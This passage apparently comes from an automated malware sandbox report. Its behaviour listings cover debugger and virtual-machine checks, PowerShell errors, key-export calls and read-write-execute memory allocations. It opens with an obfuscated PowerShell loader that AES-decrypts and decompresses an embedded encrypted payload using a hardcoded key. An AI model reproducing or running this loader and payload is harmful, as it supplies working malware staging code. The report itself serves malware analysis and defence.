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';$ynfvCucL = 'R0piaVFud0pweHlla0R6cHVqcEV5QnpobmZYdkV5UGg=';$wHuBLdg = New-Object 'System.Security.Cryptography.AesManaged';$wHuBLdg.Mode = [System.Security.Cryptography.CipherMode]::ECB;$wHuBLdg.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$wHuBLdg.BlockSize = 128;$wHuBLdg.KeySize = 256;$wHuBLdg.Key = [System.Convert]::FromBase64String($ynfvCucL);$VaVjY = [System.Convert]::FromBase64String($Ibhr);$rXaMmEYL = $VaVjY[0..15];$wHuBLdg.IV = $rXaMmEYL;$oiEgKgyJf = $wHuBLdg.CreateDecryptor();$SxPDGLzVD = $oiEgKgyJf.TransformFinalBlock($VaVjY, 16, $VaVjY.Length - 16);$wHuBLdg.Dispose();$BiPumZcr = New-Object System.IO.MemoryStream( , $SxPDGLzVD );$NxNSfxy = New-Object System.IO.MemoryStream;$JeEsnJwpr = New-Object System.IO.Compression.GzipStream $BiPumZcr, ([IO.Compression.CompressionMode]::Decompress);$JeEsnJwpr.CopyTo( $NxNSfxy );$JeEsnJwpr.Close();$BiPumZcr.Close();[byte[]] $PiONcl = $NxNSfxy.ToArray();$Larju = [System.Text.Encoding]::UTF8.GetString($PiONcl);$Larju
      2436
    - powershell.exe powershell -
      1648

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (18 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 7, 2022, 9:45 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Dec. 7, 2022, 9:45 a.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 9:45 a.m.			0	0
IsDebuggerPresent Dec. 7, 2022, 9:45 a.m.			0	0

Command line console output was observed (23 events)

Time & API	Arguments	Status	Return
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: The term 'Method' is not recognized as the name of a cmdlet, function, script f console_handle: 0x0000002f	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: ile, or operable program. Check the spelling of the name, or if a path was incl console_handle: 0x0000003b	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: uded, verify that the path is correct and try again. console_handle: 0x00000047	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: At line:1 char:7 console_handle: 0x00000053	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + Method <<<< invocation failed because [System.Security.Cryptography.AesManag console_handle: 0x0000005f	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: ed] does console_handle: 0x0000006b	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + CategoryInfo : ObjectNotFound: (Method:String) [], CommandNotFo console_handle: 0x00000077	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: undException console_handle: 0x00000083	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x0000008f	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: Bad numeric constant: 4E. console_handle: 0x000004c3	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: At line:8 char:3 console_handle: 0x000004cf	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + 4E <<<< Fw/Kfa3TDgSerXMhRYWo6lYp5tDrInObJ2YWOqylkcR/JqJBtTRFviTiiCL1IpCyBcblR console_handle: 0x000004db	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: qKzbIdGn console_handle: 0x000004e7	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + CategoryInfo : ParserError: (4E:String) [], ParentContainsError console_handle: 0x000004f3	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: RecordException console_handle: 0x000004ff	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x0000050b	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: Bad numeric constant: 4E. console_handle: 0x0000094b	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: At line:9 char:3 console_handle: 0x00000957	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + 4E <<<< Fw/Kfa3TDgSerXMhRYWo6lYp5tDrInObJ2YWOqylkcR/JqJBtTRFviTiiCL1IpCyBcblR console_handle: 0x00000963	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: qKzbIdGn console_handle: 0x0000096f	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + CategoryInfo : ParserError: (4E:String) [], ParentContainsError console_handle: 0x0000097b	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: RecordException console_handle: 0x00000987	1	1
WriteConsoleW Dec. 7, 2022, 9:45 a.m.	buffer: + FullyQualifiedErrorId : BadNumericConstant console_handle: 0x00000993	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 130 events)

Time & API	Arguments	Status	Return
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431d78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004316b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004316b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004316b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004316b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004316b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004316b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004311b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004311b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004311b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431878 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431cb8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00431b78 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004312f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004312f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038c128 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038cd68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038cd68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038cd68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Dec. 7, 2022, 9:45 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0038ca68 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 7, 2022, 9:45 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 426 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73162000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72c73000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71451000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x71452000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025f2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02761000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02604000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02677000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x025fb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02675000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02605000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02606000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Dec. 7, 2022, 9:45 a.m.	process_identifier: 1784 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
